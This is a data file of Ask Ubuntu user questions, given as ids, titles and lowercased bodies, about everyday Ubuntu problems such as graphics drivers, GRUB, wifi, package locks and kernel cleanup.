344408	hard drive indicator is slightly flashing all the time	my laptop 's hard drive indicator is slightly flashing , even when idle . how do i figure out which process is causing the hard drive activity and stop it ? i believe there should n't be any hard drive activity that goes on all the time . my laptop is lenovo thinkpad x200 with 8gb of ram , most of which is unused . hard drive is intel 520 120gb . ubuntu 13.04 64 bit . update : so , using iotop , i have caught chrome , firefox and jbd2/sda3-8 at disk writes . what can i do now and what is this jbd2/sda3-8 thing ?
344409	ubuntu 12.04.3 graphics issues : broken pipes , reinstalled xorg and bumblebee	it seems i have a problem , and am only making it worse by following what i find online . i have a new asus n550jv-d71 ( not sure about the part after the dash , though i definitely know it includes 71 ) . i decided to downgrade windows 8 to 7 , then dual boot ubuntu 12.04 with it ( there were issues with windows 8 , and i had a windows 7 disk handy ) . it did work and , after installing bumblebee in tty ( because it would n't boot when it was first installed ) , it worked marvelously for a little less than a week . however , i restarted it last night and got the could not write bytes : broken pipes error . ( i see it 's a very common error , but i 've looked at the majority of the suggested similar questions already . ) i followed what i could find online , followed those instructions ( making sure to not install any sort of graphics drivers other than what bumblebee provides ) , and it just seems to go further and further downhill . i 'm afraid i did n't write the exact steps to get to this point ( it was late by the time i gave up the night before ) , but it involved reinstalling lightdm , xorg ( and xserver ? ) , and bumblebee . i then changed the bumblebee.conf file so that device=nvidia . i 'm pretty new to linux in general ( i 've used it since 10.04 , but i had n't had issues up until this computer , so it let me stay a newbie ) , so i 'm not exactly sure what log files to look at to find the errors to look up . however , i did look at lshw and noticed that displays was marked as unassigned . also , if i try to start lightdm using the command line , it always stops at stopping mount network filesystems . i should note that there is n't an xorg.conf file , and no .xauthority . i would really , really prefer not to reinstall 12.04 if possible . i managed to get grub to display only a short time ago , and i ca n't boot to the dvd drive unless i go into the bios settings and manually change the boot order ( that was an issue from the beginning , before the ubuntu install ) , and getting into those settings often means rebooting several times due to the fact that the window to get to it is extremely small . i have most of what i need backed up , however , in case it does get to that point . if i really have to , i can just use the latest ubuntu version instead of the lts , but the reason i chose 12.04 in the first place is because i need something stable-ish , and windows is n't suitable to what i need to do . i should note that the reason i restarted last night in the first place was that it was n't charging the battery , and the wifi kept on going out . hardware : nvidia geforce gt 750m intel hd graphics 4600
344419	automatic updates	i get the error message `` requires installation of untrusted packages '' every time i try to update after entering my password . there are now 55.4mb of updates . never happened before and the updates came automatically from ubuntu . what should i do ? i use ubuntu 12.04
344420	flash plugin / youtube issue	using firefox and chrome . youtube wrking with html5 when flash plugin inactive . but youtube just stays still with black window , after loading the video , when using flash plugin to play it . ( why flash plugin needed isntead , if html wkring ? html5 hangs quite long , the same video clip through the same internet connection working with no loading breaks on other devices ( adnroid ) suspect using flash plugin on them ) . re-installed the plugin , exaclty the same problem version flashplugin-installer 11.2.202.310ubuntu0.12.04.1 any suggestions ? thanks
344423	broken package initramfs-tools	when updating at some point , packages have broken and initramfs-tools wont upgrade or let me install anything . i have tried deselecting all third party repositories and doing sudo apt-get install -f and sudo dpkg -- configure -a but nothing has an effect . please see screentshot for details .
344429	possible to install ubuntu on a second hard drive while in windows ?	i have an old computer that has no video card and an old ide hard drive . i could put my primary sata hard drive from my main computer in it all setup and ready to go for remote desktoping . then get on my laptop and remote desktop the old pc . my question is could i install ubuntu from inside windows without needing to restart and select any options or anything ? or could i could run ubuntu live and remote desktop it from my laptop ? i am trying to resurrect the old computer for a server if i can use some creativity .
344431	graphical freezes periodically ( 12.04 )	i recently installed ubuntu 12.04 ( 64 bit ) on my new laptop , though i 've been encountering somewhat of a problem . namely , the laptop will freeze every now and again . the time it freezes seems to be when something is happening , with the mouse , usually , and i do n't think i 've seen it freeze from me going away and coming back yet . i can un-freeze by ( ctrl +alt +f1 ) followed by ( ctrl +alt +f7 ) , which a friend suggested might be to do with x crashing , though i 'm somewhat of a linux newbie myself . i 've tried reinstalling ubuntu multiple times , and my system is up to date . my graphics card is a nvidia geforce gt 740m , and my processor is an intelâž coreâ˘i7 quad core mobile processor i7-3630qm ( 2.40ghz ) 6mb . anybody have any ideas ? i 've tried quite a lot , but any help would be greatly appreciated .
344434	how can i downgrade from 12.04.3 kernel and it 's xservers to 12.04.2 ones ?	hi how can i get back ( downgrade ) from 12.04.3 kernel and it 's xservers to 12.04.2 ones ? i have some problems with 12.04.3 kernel and want to downgrade .
344437	unable to install grub in dev/sdb	i 'm having trouble while installing ubuntu ( 12.04 lts ) ( overwriting win7 ) . afterwards , i encountered ( similar to this one - > http : //askubuntu.com/questions/62051 ... o-install-grub ) : 'unable to install grub in dev/sdb' executing 'grub-install/dev/sdb' this is a fatal error ! the installation finished and the pc was required to reboot . afterwards , i never got past the bios screen ( where the screen indicates that it is loading something ; booting a cdrom , a usb , or so on ) . actually , just stuck to the bios . i was unable to boot from any device ( cdrom , hdd ) *i am using a gigabyte motherboard ( ga-ep31-ds3l ) . thanks ! i have also just tried using another hard drive just in case i have hardware issues.. but it 's working smoothly . although , i have n't tried installing ubuntu on the hard drive i was referring to . p.s : i used a cd to install ubuntu .
344439	audio stops in lubuntu	i 'm new to linux so please bear with me . i have lubuntu 13.04 installed with both alsa and pulseaudio . the problem is that my audio periodically stops completely ( especially when playing bandcamp/soundcloud in firefox ) and i have to do alsa force-reload in terminal to get it working again . it 's incredibly frustrating . sometimes it happens once in a while other times it continues cutting off after multiple alsa reloads . is there any solution to this ? edit : forgot to mention i 'm using a usb soundcard as my default .
344442	how to reinstall ubuntu over elementary os on an efi system ?	first , a bit of background . i managed to dual boot ubuntu 13.04 with windows 8 ( preinstalled ) . i disabled secure boot . i had to go in the bios settings and change the disk order to select ubuntu as the first disk ( it created ubuntu as a boot device ) . grub would open and i only saw ubuntu . i opened ubuntu and ran boot repair and then when i rebooted i could see ubuntu and windows 8 . both os ' worked perfectly . after messing up ubuntu , i decided that a reinstall was in order . however i decided to install elementary os over ubuntu . since i only had 1 partition for ubuntu ( not counting swap ) i simply deleted the partition , recreated a ext4 partition , and left the boot loader in its default place ( dev/sa i believe ) . rebooted , again only option was elementary os , so i ran boot repair once again , and sure enough i got my windows 8 back . tried both and they both worked . i then was having a bit of trouble with elementary os , so i decided to reinstall ubuntu again . i repeated the same steps as before , deleted the 1 partition which contained elementary os , and installed ubuntu on a newly created partition . this is where my problem begins . upon rebooting after finishing the install , i would only get a blank screen . so i decided to look at my bios settings again and i noticed that elementary was still in the boot devices , instead of ubuntu . i thought maybe booting in the live usb and running boot repair again would fix it . ran the recommended action , rebooted and still got the blank screen . looked at the boot devices in bios and elementary is still there . i 've tried a couple of different settings in boot repair , however i always get the blank screen . for some reason i can not seem to remove elementary from the boot device list . before installing elementary , ubuntu was a boot device that i could pick from . any ideas on how to remove elementary from there and re-add ubuntu so i can load grub and pick from my two os ' ?
344443	i canâ´t install ubuntu using usb	i tried to install ubuntu 13.04 , downloaded from this site , i use a universal usb installer to create my bootable usb , when i boot and follow the steps until the one that says `` your lap has currently installed windows 7 , what do you want to do ? '' i choose the option `` install ubuntu inside { os } '' ( it says literaly `` inside { os } '' ) and click continue , my laptop restarts and the process begin since step 1 . i try and try many times , but it always happens . what can i do ? if i choose the option `` something else '' , it shows that my hard disk is already partitioned , and appear thing like : dev/sda ... ntsf ... a few days ago i installed ubuntu in virtual box , but it ran very slowly , so i decided install it by this . my lap is samsung , windows 7 intel core i3 hope you can help me .
344447	how can i emulate an amd64 system on an i386 system ?	is there a way to use virtualization to emulate an amd64 system on a system running with an i386 cpu , or with an amd64 capable cpu running an i386 kernel ? i tried using virtual-manager to set up an amd64 qemu-kvm system on my amd64 compatible turon x2 system ( with an i386 installation ) but i got a complaint that my computer was an i686 . how can i do this with my computer without reinstalling and how can others with i386 hardware do it ?
344456	online accounts and password manager forget google ; how to make them remember ?	ubuntu 13.04 . every time i reboot , both online accounts and thunderbird ( using password manager ) forget their access to google . i have to re-authorize my google account through online accounts , and i have to tell thunderbird what my password is . what is wrong ?
344461	how do i download , install , and run minecraft ? as well as openjdk7 ?	first off , i have tried downloading minecraft . i logged in , and the launcher did work . but , when i tried to `` play demo '' , this is what showed up : developer console before clicking `` play demo '' refreshing local version list ... launcher 1.2.2 ( through bootstrap 5 ) started on linux ... current time is sep 11 , 2013 8:04:23 pm system.getproperty ( 'os.name ' ) == 'linux' system.getproperty ( 'os.version ' ) == '3.8.0-30-generic' system.getproperty ( 'os.arch ' ) == 'amd64' system.getproperty ( 'java.version ' ) == '1.7.0_40' system.getproperty ( 'java.vendor ' ) == 'oracle corporation' system.getproperty ( 'sun.arch.data.model ' ) == '64' refreshing remote version list ... refresh complete . loaded 2 profile ( s ) ; selected ' ( default ) ' refreshing auth ... logging in with access token delta time to compare resources : 831 ms download job 'resources ' skipped as there are no files to download job 'resources ' finished successfully after clicking `` play demo '' client > -- -- minecraft crash report -- -- client > // daisy , daisy ... client > client > time : 9/11/13 8:10 pm client > description : initializing game client > client > org.lwjgl.lwjglexception : x error - disp : 0x7f8a042f3e50 serial : 36 error : badrequest ( invalid request code or no such operation ) request_code : 156 minor_code : 14 client > at org.lwjgl.opengl.linuxdisplay.globalerrorhandler ( linuxdisplay.java:318 ) client > at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) client > at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > > ( linuxdisplaypeerinfo.java:61 ) client > at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:788 ) client > at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) client > at org.lwjgl.opengl.display.create ( display.java:846 ) client > at org.lwjgl.opengl.display.create ( display.java:757 ) client > at org.lwjgl.opengl.display.create ( display.java:739 ) client > at ats.o ( sourcefile:297 ) client > at ats.d ( sourcefile:599 ) client > at net.minecraft.client.main.main.main ( sourcefile:101 ) client > client > client > a detailed walkthrough of the error , its code path and all known details is as follows : client > -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - client > client > -- head -- client > stacktrace : client > at org.lwjgl.opengl.linuxdisplay.globalerrorhandler ( linuxdisplay.java:318 ) client > at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) client > at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) client > at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:788 ) client > at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) client > at org.lwjgl.opengl.display.create ( display.java:846 ) client > at org.lwjgl.opengl.display.create ( display.java:757 ) client > at org.lwjgl.opengl.display.create ( display.java:739 ) client > at ats.o ( sourcefile:297 ) client > client > -- initialization -- client > details : client > stacktrace : client > at ats.d ( sourcefile:599 ) client > at net.minecraft.client.main.main.main ( sourcefile:101 ) client > client > -- system details -- client > details : client > minecraft version : 1.6.2 client > operating system : linux ( amd64 ) version 3.8.0-30-generic client > java version : 1.6.0_27 , sun microsystems inc. client > java vm version : openjdk 64-bit server vm ( mixed mode ) , sun microsystems > inc . client > memory : 1031430600 bytes ( 983 mb ) / 1105395712 bytes ( 1054 mb ) up to 1105395712 bytes ( 1054 mb ) client > jvm flags : 2 total ; -xmx1100m -xms1100m client > aabb pool size : 0 ( 0 bytes ; 0 mb ) allocated , 0 ( 0 bytes ; 0 mb ) used client > suspicious classes : no suspicious classes found . client > intcache : cache : 0 , tcache : 0 , allocated : 0 , tallocated : 0 client > launched version : 1.6.2 client > lwjgl : 2.9.0 client > opengl : ~~error~~ runtimeexception : no opengl context found in the current thread . client > is modded : probably not . jar signature remains and client brand is untouched . client > type : client ( map_client.txt ) client > resource pack : default client > current language : ~~error~~ nullpointerexception : null client > profiler position : n/a ( disabled ) client > vec3 pool size : ~~error~~ nullpointerexception : null client > # @ ! @ # game crashed ! crash report saved to : # @ ! @ # /home/kevinlin3100/.minecraft > /crash-reports/crash-2013-09-11_20.10.15-client.txt client > # client > # a fatal error has been detected by the java runtime environment : client > # client > # sigsegv ( 0xb ) at pc=0x00007f8a005c0ae8 , pid=5020 , tid=140230833391360 client > # client > # jre version : 6.0_27-b27 client > # java vm : openjdk 64-bit server vm ( 20.0-b12 mixed mode linux-amd64 compressed oops ) client > # derivative : icedtea6 1.12.6 client > # distribution : ubuntu 12.04 lts , package 6b27-1.12.6-1ubuntu0.12.04.2 client > # problematic frame : client > # c [ libx11.so.6+0x33ae8 ] xqueryextension+0x28 client > # client > # an error report file with more information is saved as : client > # /home/kevinlin3100/.minecraft/hs_err_pid5020.log client > # client > # if you would like to submit a bug report , please include client > # instructions how to reproduce the bug and visit : client > # https : //bugs.launchpad.net/ubuntu/+source/openjdk-6/ client > # game ended with bad state ( exit code 134 ) ignoring visibility rule and showing launcher due to a game crash deleting /home/kevinlin3100/.minecraft/versions/1.6.2/1.6.2-natives-4478207449754 i also want to know how to install tar.gz files . google offers me no help . that is how i want to install openjdk7 x64 . ( ie from the oracle website ) . i have ubuntu 12.10 lts . the server works fine , and all its features . it 's just the actual game that i 'm worried about .
344469	how to execute uwsgi with bash script and display warning if terminal window is closed ?	i 'm currently working on a web project on uwsgi , it 's quite a chore to keep typing the same command in the terminal everytime i want to start up uwsgi , so i made an executable script that will automatically run the process when i execute it . it works , but the problem is , normally when i run uwsgi from the terminal manually ( by typing in the commands ) , when i try to close the terminal window while the process is still running , it will prompt me if i want to terminate the process before closing the terminal . however , the terminal window that appears after i ran the executable script from gui will not warn me when i accidentally close the window , and as a result the process will still be running in the background . how can i make the script such that it will display a warning like it normally will when i try to close the terminal window when the process is still running ?
344473	why are blank items showing up in my unity dash	on my computer , blank items are showing up in the unity dash and i ca n't figure out how to remove them . what are they/how can i remove them ?
344474	running 13.04 on dell xps 12 ?	will ubuntu 13.04 run well on my dell xps 12 ? basically , i want the most up to date ubuntu software working on my computer and with touch support .
344477	error with virtualbox	i have a pc with windows 8 4gb ram 500gb hd and use virtualbox 4.2.18 ( current ) , however , already downloaded several types of isos of ubuntu to virtualize and none of them got success . it takes forever to install and when it says that the machine needs to be rebooted to start using ubuntu a message : virtualbox-o stopped working windows searching for a solution to this problem ... and finally lose everything and does not install anything . already downloaded several isos and also already tested in other versions of virtualbox and nothing 's right . what can i do ? what is the solution ? isos used : 12:04 , 12:10 , 13:04 .
344478	unable to shut down laptop after logging out of ubuntu 12.04	i logged into the ubuntu 12.04 lts and instead of installing it ... i pressed the log out button , thinking of installing it some other time . but then a screen appeared asking for username and password . i typed in my name as the user name and a password of my choice..i was halfway through typing my password..just then i remembered that i had to login as 'root ' so i hurriedly pressed the back button ... but instead the user name and half password i typed.. got submitted . now it is asking for user name and password and when i type the ones which i had initially typed..its showing login error : ( but the problem does n't end here ... m unable to shut down my laptop.. its been more than 12 hours and m stuck at this login screen ... plzzz help me out !
344479	can not connect to wi-fi with ar5bwb222 on ubuntu 13.04	i have just installed ubuntu 13.04 , and am using an atheros wireless card ( ar5bwb222 ) . i find that i can see networks , but can not connect to any of them . attempting to do so leads to about 30 seconds of attempting to connect , following by a message telling me that i have been disconnected . i have no backup network connection and can not therefore run any sudo apt-get commands , although i can transfer files very slowly by loading windows 8 and saving files to another partition ( i can not use a usb stick as only my two usb 3.0 ports appear to be recognized by ubuntu , both of which i need for mouse/keyboard ) . lsmod tells me that ath9k is in use , but fixes related to using usehwcrypt=0 have had no effect . rfkill shows no hard or soft block . i will happily post any and all relevant diagnostic information , of course . i apologize if i am repeating an already known bug , but my searches elsewhere have not given me any working solutions . this is particularly problematic as i need to install the wireless to be able to run boot-repair before i can even boot into the right partition to begin fixing my problems with the usb ...
344483	how can i safely update my intel ironlake mobile x86/mmx/sse2 graphics driver ?	i 've just installed ubuntu 12.04 lts and everything is working well except my external monitor . it 's somewhat glitchy when i move windows around in it . also , its resolution is lower than it should be . it 's currently at 1024 x 768 ( the highest resolution option in the `` displays '' setting window ) , but it should be 1200 or so in width . here is my graphics/driver information : my driver is intel ironlake mobile x86/mmx/sse2 . ( from the `` details '' section of the settings ) also , when i typed `` lspci | grep vga '' into the terminal , i got this : 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) i 'm thinking that i have incorrect or out of date drivers . my problem , though , is i do n't know how or where to find the correct drivers . i spent a lot of time installing an intel driver repository only to run it and find out that my distribution ( ubuntu 12.04 ) is not supported . i hear there are ways of forcing the repository to update your drivers , but it requires using ppas , which i 've heard are risky . i also went to https : //01.org/linuxgraphics/downloads and did a search for ironlake , which brought up some links . they 're possibly the drivers i 'm looking for , but i do n't know if they 're the right ones and i do n't want to mess anything up by just installing things willy nilly ( also , i 'm not super clear on how i would go about installing them in the first place ) . i know there are a lot of similar issues on here , so i wo n't be surprised if this gets no response . but i 'd really like to get my ubuntu system up and running nicely , so i thought i 'd give this a shot . i 'll keep looking around for other solutions . hopefully i do n't ruin anything . thanks , blake
344484	running openvpn with dhclient without messing up name resolution	i connect to an openvpn server that requires me to set up the tap interface with dhclient after establishing the connection . i run and exit dhclient like this : /sbin/dhclient -nw -v tap0 /sbin/dhclient -r my problem is that name resolution ceases to work after stopping the tunnel . the problem relates to dnsmasq and resolvconf . i have read man pages and blogs , but am unable to fully grasp how these components work together or how to solve my problem , so i will list what i know and hope that someone can help me from there . on running dhclient , the name server of the remote network gets added to /etc/resolv.conf . it seems that this is done through by the /etc/dhcp/dhclient-enter-hooks.d/resolvconf script , which adds a resolvconf record , which in turn results in the change in /etc/resolv.conf . the content of the resolv.conf is like this nameserver ip of nameserver on remote lan nameserver 127.0.1.1 search search-domains from the remote lan + my normal search domain on exiting dhclient the enter-hook script seems to run again , however , /etc/resolv.conf does not get updated . i am not sure if the resolvconf record gets deleted or not . is there any way to check this ? /run/nm-dns-dnsmasq.conf is always empty . not sure if this means anything . i am assuming that the fact that resolv.conf does not get updated is the reason that name resolution does not work . however , i am not sure how dnsmasq works . i was under the impression that dnsmasq would somehow establish a split dns so that queries related to the remote lan went to the remote lans name server and everything else to the `` normal '' name server .
344487	how to transfer a dvd to my hard drive	i have several dvd i want to transfer to my hard drive . i want to have the dvd menu and such . not only the movie . i was sure that ripping the movie will do the trick but it did n't work . what can i do then ? i tried dvd : :rip and acidrip . both are n't that clear to operate .
344488	how can i run ubuntu desktop on my galaxy nexus ?	is there a method to run a fully functional ubuntu system on the galaxy nexus ? the two methods i know of are ubuntu touch preview , and ubuntu on top of android via vnc , but there are problems with both if you want to use it like an ultraportable laptop . ubuntu touch preview lacks standard desktop features . ubuntu on android via vnc is unresponsive enough to be impractical for daily use . my requirements are : full desktop ui with browser , terminal , etc hdmi out support bluetooth support for keyboard/mouse responsive enough to use on the ubuntu for phones site it advertises the desktop view feature : `` the phone becomes a full pc and thin client when docked. '' . and there 's the demo by canonical of something similar running under ubuntu for android . i realize they 're different systems , but the end effect in both is to have a full ubuntu system running on the phone . unfortunately i have n't figured out how to replicate this , and to my knowledge canonical has n't released anything like it publicly .
344489	unable to connect to wifi , 12.04 macbook pro	just intalled ubuntu 12.04 on my macbook pro . tried installing additional drivers to be able to use my wifi card . it says the activation failed and to check /var/log/jockey.log i went here to try and fix that http : //ubuntuforums.org/showthread.php ? t=1606745 in syanaptic package manager there is a like red ubunutu logo next to bcmwl-kernel-source and when i try and reinstall it says : sorry a problem occured and it states that it was package : bcmwl-kernel-source can anyone help ? id love to be able to connect to wireless .
344492	extract text from pdf , ms ofiices file and other document	i need a command line tool that will extract plain text from ms office files ( all formats ) , pdf and other file formats . i looked at libre office command line but was not able to find the filters for all formats
344497	drm : drm_edid_block_valid ] *error* edid has major version 0 , instead of 1	in my sys logs i can see errors like below . can you suggest whats wrong and how i can fix . i have been experiencing frequent system hang behaviour which i have to stop by hard system boot thanks , sep 7 10:51:52 nanak-p570wm kernel : [ 42.403661 ] [ drm : drm_edid_block_valid ] *error* edid has major version 0 , instead of 1 write of 0x00000060 fault at 0x418e00 [ ibus ] sep 7 10:51:29 nanak-p570wm kernel : [ 19.826781 ] nouveau e [ pbus ] [ 0000:01:00.0 ] mmio write of 0x00000000 fault at 0x419ab0 [ ibus ] sep 7 10:51:29 nanak-p570wm kernel : [ 19.826790 ] nouveau e [ pibus ] [ 0000:01:00.0 ] gpc0 : 0x419cb8 0x00b08bea ( 0x3800820c ) sep 7 10:51:29 nanak-p570wm kernel : [ 19.826796 ] nouveau e [ pibus ] [ 0000:01:00.0 ] gpc1 : sep 14 10:28:55 nanak-p570wm kernel : [ 4855.198902 ] acpi : ec : gpe storm detected ( 9 gpes ) , transactions will use polling mode updating system information os : ubuntu 13.10 linux 3.11.0-7-generic hardware clevo p570wm cpu intel ( r ) core ( tm ) i7-3970x cpu @ 3.50ghz graphics card gk104m [ geforce gtx 780m ] driver=nouveau i did not installed the driver provided by nvidia till now . wanted to try if defaults ubuntu drivers can work . http : //www.nvidia.com/object/linux-display-amd64-319.32-driver.html wireless intel corporation 7260 driver=iwlwifi driverversion=3.11.0-7-generic firmware=22.0.7.0 bios american megatrends inc. version : 4.6.5 date : 03/20/2013
344498	unable to acquire lock while installing software	while installing package i 'm getting this error . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
344502	nautilus fail for remote	i am testing remote desktop from windows to ubuntu 12.04 with ssh . i can get connected and commandline works ok . however , when i use `` nautilus '' to display the desktop of ubuntu , it failed . but nautilus itself works no problem when i directly use it on ubuntu , it can display the desktop . anyone knows about this problem ? thanks . ** ( nautilus:9732 ) : warning ** : command line `dbus-launch -- autolaunch=23357284be8dc03a3651b9e200000007 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n could not parse arguments : can not open display :
344504	how to free space in root directory and delete unnecessary kernel files ?	off late i am receiving continuous system alerts regarding low disk space in my root directory . i am given to understand that all my system updates are being saved in my root directory instead of my home directory and i do not know how to change this ! ! this is the output of my /boot : /boot $ ll total 73144 drwxr-xr-x 3 root root 4096 sep 12 01:09 ./ drwxr-xr-x 25 root root 4096 aug 3 03:19 ../ -rw-r -- r -- 1 root root 848290 jan 25 2013 abi-3.5.0-23-generic -rw-r -- r -- 1 root root 852420 jun 20 14:46 abi-3.5.0-36-generic -rw-r -- r -- 1 root root 852910 jul 10 14:09 abi-3.5.0-37-generic -rw-r -- r -- 1 root root 147880 jan 25 2013 config-3.5.0-23-generic -rw-r -- r -- 1 root root 148142 jun 20 14:46 config-3.5.0-36-generic -rw-r -- r -- 1 root root 148157 jul 10 14:09 config-3.5.0-37-generic drwxr-xr-x 3 root root 12288 sep 12 01:07 grub/ -rw-r -- r -- 1 root root 15540700 jul 25 14:14 initrd.img-3.5.0-23-generic -rw-r -- r -- 1 root root 15626049 jul 26 03:38 initrd.img-3.5.0-36-generic -rw-r -- r -- 1 root root 15688487 sep 12 01:09 initrd.img-3.5.0-37-generic -rw-r -- r -- 1 root root 176764 nov 27 2011 memtest86+.bin -rw-r -- r -- 1 root root 178944 nov 27 2011 memtest86+_multiboot.bin -rw -- -- -- - 1 root root 3023265 jan 25 2013 system.map-3.5.0-23-generic -rw -- -- -- - 1 root root 3021733 jun 20 14:46 system.map-3.5.0-36-generic -rw -- -- -- - 1 root root 3022033 jul 10 14:09 system.map-3.5.0-37-generic -rw-r -- r -- 1 root root 5189248 jul 25 11:06 vmlinuz-3.5.0-23-generic -rw -- -- -- - 1 root root 5183904 jun 20 14:46 vmlinuz-3.5.0-36-generic -rw -- -- -- - 1 root root 5184992 jul 10 14:09 vmlinuz-3.5.0-37-generic will deleting any unused kernel files help ? i am pretty confident that my current kernel version is 3.5.0-37-generic , so does that imply i can delete the other two : 0-23 and 0-36 ? which files should i be deleting here or none at all ? also , are there any other things i should be doing in order to free up space on my root folder and make room for further system updates ? is there any way to change this location to somewhere in the `` home '' directory instead ? ? thanks in advance ! edit : $ df -h filesystem size used avail use % mounted on /dev/sda10 5.7g 5.2g 244m 96 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 766m 928k 766m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 368k 1.9g 1 % /run/shm /dev/sda11 27g 16g 9.8g 61 % /home
344505	about package installation in ubuntu	how to install g cc/g++ compiler , auto make , x11 lib , free glut , gt k+ 2.0 and wxgtk-2.8.11 in ubuntu by using synaptic packet manager or terminal . i want to know if these packages are by default in ubuntu os or do i need to download from their website and install .
344506	permission denied when running make install	i 'm trying to install llvm . i cloned the repository and ran ./configure . now , i need to run sudo make install . when i run this , i get the following errors : harshilsharma63 @ ubuntu : ~/llvm $ sudo make install [ sudo ] password for harshilsharma63 : llvm [ 0 ] : installing include files make : execvp : /home/harshilsharma63/llvm/autoconf/mkinstalldirs : permission denied make : *** [ install-local ] error 127 harshilsharma63 @ ubuntu : ~/llvm $ sudo make install llvm [ 0 ] : installing include files make : execvp : /home/harshilsharma63/llvm/autoconf/mkinstalldirs : permission denied make : *** [ install-local ] error 127 i have installed build-essentials . i cloned the repository using svm in fedora and copied the downloaded files from fedora - > windows - > ubuntu . note : i 'm using ubuntu 12.04
344507	why does my computer just keep restarting while trying to install ubuntu 13.04 ( x86 ) from usb alongside windows 7 ?	i have checked the other questions , but none of them match my problem ( the ones that do do n't have satisfactory answers ) . i downloaded the ubuntu 13.04 iso and burned it to my usb device following the given instructions . i was also able to boot the ubuntu setup from it by changing the boot sequence so that the usb device is now at the top . but i am only able to use the `` trial '' version of ubuntu . every time i tick `` install ubuntu alongside windows '' and click `` continue '' , the computer just restarts and i see the same try-ubuntu-or-install-it menu . i have tried pressing any key when that little icon appears at the bottom , but it is not at all helpful . i also read somewhere that i should eject my usb device after i click `` continue '' , but doing so just makes the computer run windows 7 instead .
344512	what is the general procedure to install development libraries in ubuntu ?	i am having a pretty tough time installing the latest development libraries of sdl in my ubuntu 12.04 . last year , i somehow managed to install libsdl 1.2-dev for ubuntu . as far as i remember , i did it using synaptic package manager . now , i want to work with the latest sdl libraries . in the page containing downloads for sdl version 2.0.0 ( which is the latest stable version ) , under linux section for development libraries , it is given please contact your distribution maintainer for updates . it would help me a lot if someone answered these questions : why is it so not simple to install dev libraries in ubuntu ? can anyone give an exhaustive list of the ways to install these libraries on the system so that one can use them for programming ? it would be helpful if you can give the above answer taking the latest sdl dev libraries as an example . also what is the procedure to clean all the previous versions from the system while installing the latest versions ? ps : i searched for the libsdl-dev package on synaptic package manager , but it is not showing up the latest version .
344515	can not display anything when the laptop lid open	i am using the lenovo y400 ( graphics card is nvdia gt650m , the hd4000 is disabled by the bios automatically ) i have set the `` do nothing '' when closing the lid , but when i open it again , the screen displays nothing , even though the laptop is still working . how can i solve this problem ?
344518	wifi disconnects randomly on dualboot half mac half linux ?	i have ubuntu 12.04 running next to macbook pro and the wifi on linux drops and establishes connection constantly . it gets really annoying and i was wondering if there is any way to fix this problem ?
344521	need a pdf editor that will let me highlight text	i 've looked in the software centre but no mention of highlight features for the various pdf edit software . i 've installed adobe reader 9 but it does n't seem to have the option . does anyone know of a pdf editor/reader that will let me highlight ? i 'm running ubuntu 13.04
344526	how to use the apple ir controller for pdf presentations ?	i own a macbook pro with an integrated ir receiver and an apple remote controller . i would like to use it for doing pdf presentations ( i usually use latex to create the slides ) . i was able to configure lircd to control the receiver , but as far as i know there is no pdf viewer in linux with lirc support , so i am left with two solutions : configure irxevent to send xevents to an application configure irexec to run `` xte '' and synthesize a keypress the problem with a ) is that some applications ( like terminal and , as it seems , also evince ) , do not accept events , so irxevent can not be used with them . the problem with b ) is that i can not differentiate between applications , so i can only send the same keypress for the same ir event , while irxevent is able to send different signals for the same keypress depending on the window name ( so that i can map play to space when running mplayer , but also map it to f5 when running evince ) . however , i guess the best solution would be to add lirc support to evince .
344529	fail to see sharing in one computer of 3	i have 3 computers , all ubuntu 13.04 . i have shared folders on all which i would like to be able to access on the other computers . for some strange reason the 3rd computer can only see its own shared files . it fails to see the other computers ( under nautilus ) . the computer is connected to the lan because it has no trouble printing on a shared network printer . the other 2 computers see one another and can access all of the shared folders ( excluding those on the 3rd computer ) . i tried to put in the location window of nautilus the location of the folder , so as not to depend upon the browse . for example on the 3rd computer i put smb : //ilan-main/mydb it gave me the error message : oops ! something went wrong . unhandled error message : failed to mount windows share : connection timed out . i also tried to connect to the 3rd computer from this one with smb : //ilan-lenovo-g570/temp and i received the same error . i 'm quite sure this used to work , but i 'm not sure when it stopped working . ( a computer died and had to be replaced and it is possible that it never worked on the new computer which did the replacement . ) in any case , i would be grateful for any suggestions . thanks , ilan
344536	how to reset options on a printing dialog ?	i have a network printer installed . in the printer properties dialog , i clearly have the printer option `` double sided printing '' set to `` on ( flip on long edge ) '' , and the job option `` pages per side '' set to `` 1 '' : however , when i open the print dialog of evince , i see 2 pages per slide and one-sided printing : i was not able to change this to system defaults for the printer . whatever i do , these two options stay the same . i re-installed the printer , i have removed all evince settings from ~/.config , ~/.local or ~/.gnome .
344539	no root privileges when using gui	so i 'm logged in as the user 'shannon ' , but ca n't gain root access through the gui when i 'm prompted to install a program for example . however using sudo su , type in the root password , gain access through the terminal and then install the programs from there . are n't these passwords supposed to be identical ? does anyone know how to fix this one ?
344543	unable to get email cache on mail clients on raring ringtail	i 'm using ubuntu 13.04 raring ringtail . when i try to send an email my email cache does not show email addresses of the people i have sent emails to before which is annoying cause i have to type the whole email address every time for each person i need to send the email to . tried thunderbird and evolution . is there any way i can get this fixed ? any help would be greatly appreciated . thanks
